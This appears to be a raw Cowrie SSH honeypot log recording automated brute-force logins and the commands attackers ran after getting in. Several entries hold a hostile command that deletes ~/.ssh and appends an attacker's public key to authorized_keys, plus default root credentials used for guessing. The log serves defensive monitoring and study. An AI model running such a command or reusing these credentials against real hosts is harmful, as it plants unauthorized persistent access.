{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.359108Z","src_ip":"185.152.45.241","session":"8392024886aa"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.584035Z","src_ip":"185.152.45.241","session":"8392024886aa"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:31:55.633750Z","src_ip":"185.152.45.241","session":"8392024886aa"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11772,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1e23eb61e46","protocol":"ssh","message":"New connection: 185.152.45.241:11772 (1.2.3.4:22) [session: a1e23eb61e46]","sensor":"my-vps","timestamp":"2025-09-09T02:31:55.678869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:31:55.679697Z","src_ip":"185.152.45.241","session":"a1e23eb61e46"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:31:55.734024Z","src_ip":"185.152.45.241","session":"a1e23eb61e46"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:31:55.974423Z","src_ip":"185.152.45.241","session":"a1e23eb61e46"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:31:56.026169Z","src_ip":"185.152.45.241","session":"a1e23eb61e46"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:31:56.029133Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:03.370057Z","src_ip":"212.227.125.160","session":"78258ba48bfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46132,"dst_ip":"1.2.3.4","dst_port":22,"session":"896c28a3466c","protocol":"ssh","message":"New connection: 212.227.235.229:46132 (1.2.3.4:22) [session: 896c28a3466c]","sensor":"my-vps","timestamp":"2025-09-09T02:32:19.236209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:32:19.243860Z","src_ip":"212.227.235.229","session":"896c28a3466c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:32:19.491455Z","src_ip":"212.227.235.229","session":"896c28a3466c"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123123","message":"login attempt [dev/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:32:20.493952Z","src_ip":"212.227.235.229","session":"896c28a3466c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:21.747242Z","src_ip":"212.227.235.229","session":"896c28a3466c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57134,"dst_ip":"1.2.3.4","dst_port":22,"session":"76e9adb47953","protocol":"ssh","message":"New connection: 212.227.235.229:57134 (1.2.3.4:22) [session: 76e9adb47953]","sensor":"my-vps","timestamp":"2025-09-09T02:32:39.202362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:32:39.210068Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:32:39.584294Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@123","message":"login attempt [root/huawei@123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:32:41.085119Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:32:41.875530Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:32:41.876548Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:32:41.877852Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:42.260662Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:32:43.114035Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:32:43.114871Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:32:43.498502Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:43.499479Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58948,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9d7a450d8bd","protocol":"ssh","message":"New connection: 212.227.235.229:58948 (1.2.3.4:22) [session: d9d7a450d8bd]","sensor":"my-vps","timestamp":"2025-09-09T02:32:43.871441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:32:43.875170Z","src_ip":"212.227.235.229","session":"d9d7a450d8bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:32:44.251499Z","src_ip":"212.227.235.229","session":"d9d7a450d8bd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:32:45.757906Z","src_ip":"212.227.235.229","session":"d9d7a450d8bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41190,"dst_ip":"1.2.3.4","dst_port":22,"session":"875ee7022abd","protocol":"ssh","message":"New connection: 212.227.235.229:41190 (1.2.3.4:22) [session: 875ee7022abd]","sensor":"my-vps","timestamp":"2025-09-09T02:32:46.710627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:32:46.712351Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:32:47.010170Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:47.138038Z","src_ip":"212.227.235.229","session":"d9d7a450d8bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60340,"dst_ip":"1.2.3.4","dst_port":22,"session":"a71a71094331","protocol":"ssh","message":"New connection: 212.227.235.229:60340 (1.2.3.4:22) [session: a71a71094331]","sensor":"my-vps","timestamp":"2025-09-09T02:32:47.511915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:32:47.521556Z","src_ip":"212.227.235.229","session":"a71a71094331"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:32:47.897398Z","src_ip":"212.227.235.229","session":"a71a71094331"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@123","message":"login attempt [root/huawei@123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:32:48.209365Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:32:48.866929Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:32:48.867705Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:32:48.868848Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:49.170708Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:32:49.404413Z","src_ip":"212.227.235.229","session":"a71a71094331"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:32:49.789201Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:32:49.789876Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:49.792678Z","src_ip":"212.227.235.229","session":"76e9adb47953"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:49.793487Z","src_ip":"212.227.235.229","session":"a71a71094331"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:32:50.091348Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:50.092217Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42534,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d5630adb6f7","protocol":"ssh","message":"New connection: 212.227.235.229:42534 (1.2.3.4:22) [session: 7d5630adb6f7]","sensor":"my-vps","timestamp":"2025-09-09T02:32:50.303321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:32:50.303935Z","src_ip":"212.227.235.229","session":"7d5630adb6f7"}
